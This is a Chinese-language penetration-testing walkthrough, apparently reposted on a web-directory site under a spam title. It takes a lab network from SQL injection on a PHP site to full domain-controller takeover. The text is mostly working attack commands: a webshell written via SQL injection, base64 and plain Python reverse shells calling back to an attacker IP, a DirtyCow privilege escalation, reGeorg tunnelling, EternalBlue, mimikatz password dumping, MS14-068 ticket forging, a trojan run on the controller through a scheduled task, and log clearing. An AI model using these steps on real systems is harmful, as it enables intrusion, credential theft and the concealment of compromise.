日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

拓撲環境

  1. Kali linux(攻擊機)
  2. centos6.4(web服務器)
  3. win7(域成員主機無法上網)
  4. win2008R2(域控無法上網)
內網滲透橫向攻擊流程

 

目的

通過Kali Linux拿到域控權限

2021最新整理網絡安全滲透測試/安全學習(全套視頻、大廠面經、精品手冊、必備工具包)一>關注我,私信回復"資料"獲取<一

Web滲透

目錄掃描

使用dirbuster工具掃描網站根目錄
設置kali默認字典文件
/usr/share/wordlists/dirbuster/directory­list­lowercase­2.3­small.txt

內網滲透橫向攻擊流程

 

掃描獲得phpinfo.php

內網滲透橫向攻擊流程

 

得到網站絕對路徑信息

內網滲透橫向攻擊流程

 

SQL查詢報錯

通過測試發現存在sql整型注入報錯情況,進一步獲取webshell

內網滲透橫向攻擊流程

 

SQL注入

通過sqlmap測試發現存在sql注入

sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MySQL ‐v3

內網滲透橫向攻擊流程

 

獲取webshell

這里有絕對路徑的情況下,可直接寫入webshell。這里使用sqlmap os­shell的功能

sqlmap(os­shell)

#通過sqlmap獲取命令執行會話
sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`

內網滲透橫向攻擊流程

 

直接寫webshell(pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'

反彈shell

為了更好做后續操作,進行反彈shell

獲取目標系統信息

os‐shell> uname ‐a
os‐shell> whereis Python`

內網滲透橫向攻擊流程

 

獲取meterpreter會話

由于網站上為linux默認安裝python,可直接生成python反彈腳本

#生成python反彈腳本
msfvenom ‐p
python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 ‐f raw
#msf監聽反向連接會話
msfconsole
use exploit/multi/handler
set payload
python/meterpreter/reverse_tcp set LHOST IP
set LPORT 4444
run
#msf監聽快速啟動
cat py_reverse_tcp.rc
use exploit/multi/handler
set payload
python/meterpreter/reverse_tcp set LHOST 192.168.0.17
set LPORT 4444

exploit
msfconsole ‐r py_reverse_tcp.rc

#在sqlmap os‐shell模式下執行python meterpreter反彈腳本

os‐shell> python ‐c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF‐8')} [sys.version_info[0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"
內網滲透橫向攻擊流程

 

nc+python反彈

#kali監聽會話

root@kali:~# nc ‐lvvp 6666
#在sqlmap os‐shell模式下執行python bash反彈腳本
os‐shell> python ‐c "import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((' IP',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.filen o(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');s.clos e();"` 

sqlmap執行:

內網滲透橫向攻擊流程

 

監聽端口返回反彈shell結果:

內網滲透橫向攻擊流程

 

提權

拿到shell后,嘗試提升權限

查看當前內核版本

通過uname ­a獲取當前系統內核版本

內網滲透橫向攻擊流程

 

使用已知漏洞提權

根據可已知內核漏洞下載對應的提權程序(該處使用臟牛內核提權)

cd /tmp/ wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dir ty.c gcc ‐pthread dirty.c ‐o dirty ‐lcrypt ./dirty 123456

內網滲透橫向攻擊流程

 

獲得firefart用戶,權限為root

su firefart

內網滲透橫向攻擊流程

 

切換用戶為firefart后,將passwd恢復,避免root用戶無法使用

mv /tmp/passwd.bak /etc/passwd

內網滲透橫向攻擊流程

 

橫向滲透

通過查看網卡信息后發現存在內網地址信息

內網滲透橫向攻擊流程

 

內網代理

meterpreter自動路由(首選)

meterpreter > run autoroute ‐s 10.0.1.0/24 meterpreter > run autoroute ‐p

內網滲透橫向攻擊流程

 

reGeorg+proxychains

由于web服務器第二張網卡無法上網,需進行內網代理

在web服務器的shell下,下載tunnel.nosocket.php文件,做代理流量

1、網絡下載 wget ‐‐no‐check‐certificate
https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.noso cket.php mv tunnel.nosocket.php /var/www/html/ 2、本地上傳 upload /root/reGeorg/tunnel.nosocket.php /var/www/html

內網滲透橫向攻擊流程

 

可正常訪問tunnel.nosocket.php文件

[

內網滲透橫向攻擊流程

 

Kali上執行reGeorg代理腳本

python reGeorgSocksProxy.py ‐p 9999 ‐u http://IP:8888/tunnel.nosocket.php

內網滲透橫向攻擊流程

 

修改proxychains配置文件,在末行添加socks信息。

vim /etc/proxychains.conf socks5 127.0.0.1 9999

內網滲透橫向攻擊流程

 

##msf自帶代理設置

setg Proxies socks5:127.0.0.1:9999

內網資產掃描

端口掃描

使用msf自帶端口掃描模塊,探測出10.0.1.9和10.0.1.254都存在445、3389端口。

use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.1.1/24 set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5 631,5900,5938,5984,6379,8000,8080,7001,9080,9200,10051,11211,20880,270 17,50070 set THREADS 10 exploit

10.0.1.9 IP端口開放情況

內網滲透橫向攻擊流程

 

10.0.1.254 IP端口開放情況

內網滲透橫向攻擊流程

 

MS17­010漏洞主機掃描

通過代理方式,使用msf框架掃描內網網段中存在MS17­010漏洞主機

root@kali:~# proxychains msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOST 10.0.1.0‐254 set threads 10 exploit

內網滲透橫向攻擊流程

 


內網滲透橫向攻擊流程

 


內網滲透橫向攻擊流程

 

MS17­010漏洞利用

通過meterpreter路由方式,background之后使用ms17­010攻擊模塊進行攻擊

use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOSTS 10.0.1.9 run

內網滲透橫向攻擊流程

 

域滲透

信息收集

查看當前主機信息

meterpreter > sysinfo

內網滲透橫向攻擊流程

 

獲取當前域

內網滲透橫向攻擊流程

 

使用mimikatz獲取密碼

加載mimikatz模塊

meterpreter > load mimikatz #讀取內存中存放的賬號密碼明文信息 meterpreter > wdigest

內網滲透橫向攻擊流程

 

獲取域賬號SID

meterpreter > run post/windows/gather/enum_logged_on_users

內網滲透橫向攻擊流程

 

域控定位

net group "domain controllers" /domain ping dc1.kevin.com

內網滲透橫向攻擊流程

 


內網滲透橫向攻擊流程

 

MS14­068

python腳本生成票據

proxychains python ms14‐068.py ‐u liujiafeng@kevin.com ‐s S‐1‐5‐21‐ 4289546598‐4075965387‐827630551‐1111 ‐d 10.0.1.254 ‐p kevin@123

msf模塊生成票據

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set DOMAIN KEVIN.com set USER liujiafeng set PASSWORD kevin@123 set USER_SID S‐1‐5‐21‐4289546598‐4075965387‐827630551‐1111 set RHOST 10.0.1.254

內網滲透橫向攻擊流程

 

本地生成kirbi文件

#kali切換目錄到loot下將ms14‐068 bin票據復制到物理機 /root/.msf4/loot/ #物理機通過mimikatz轉為kirbi文件 mimikatz # kerberos::clist
20191223050146_default_10.0.1.254_windows.kerberos_122860.bin /export

內網滲透橫向攻擊流程

 

kirbi轉為ccache

#再將kirbi文件放到kali ticket_converter轉換腳本目錄下 #將kirbi文件轉為ccache python ticket_converter.py 0‐00000000‐liujiafeng@krbtgt‐KEVIN.COM.kirbi TGT_liujiafeng@kevin.com.ccache mv TGT_liujiafeng@kevin.com.ccache /root/pykek/

內網滲透橫向攻擊流程

 

生成正向連接的msf test.exe木馬

生成msf監聽端口程序

msfvenom ‐p windows/x64/meterpreter/bind_tcp LHOST=10.0.1.254 LPORT=4444 ‐f exe ‐o /root/pykek/test.exe

新建一個msf會話監聽正向連接payload

use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 10.0.1.254

上傳利用工具

上傳利用工具、ms14­086黃金票據到win7跳板機上

upload /root/pykek/TGT_liujiafeng@kevin.com.ccache C:/users/kevin upload /usr/share/windows‐resources/mimikatz/x64/mimikatz.exe C:/Users/kevin upload /root/pykek/test.exe c:/users/kevin shell

內網滲透橫向攻擊流程

 

票據導入

在win7跳板機上執行

`#清空票據 klist purge
#導入票據

cd c:/users/kevin
mimikatz.exe
kerberos::ptc TGT_liujiafeng@kevin.com.ccache

復制木馬到域控

再通過win7跳板機復制test.exe到域控c盤,并通過at命令添加定時任務執行test.exe

`copy test.exe dc1.kevin.comc$ dir dc1.kevin.comc<pre class=“copy-codeblocks” style=“font-family: Consolas, Menlo, Monaco, “Lucida Console”, “Liberation Mono”, “DejaVu Sans Mono”, “Bitstream Vera Sans Mono”, “Courier New”, monospace; font-size: 15.008px; display: block; position: relative; overflow: visible; color: rgb(34, 34, 34); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;”

內網滲透橫向攻擊流程

 

在域控上添加at定時任務執行木馬

net time \dc1.kevin.com at \dc1.kevin.com 15:42:00 c:test.exe

內網滲透橫向攻擊流程

 

查看當前域控at定時任務

at \dc1.kevin.com

內網滲透橫向攻擊流程

 

在域控at定時任務執行后,連接域控4444端口

內網滲透橫向攻擊流程

 

netstat ‐ano |findstr "4444"

內網滲透橫向攻擊流程

 

所有獲得的meterpreter會話

內網滲透橫向攻擊流程

 

清除痕跡

結束msf木馬進程,刪除exe進程

at \dc1.kevin.com 16:23:00 cmd /c del c:test.exe

刪除win7工具

cd c:/users/kevin rm TGT_liujiafeng@kevin.com.ccache rm mimikatz.exe

windows刪除系統日志

clearev

分享到:
標簽:內網 滲透
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定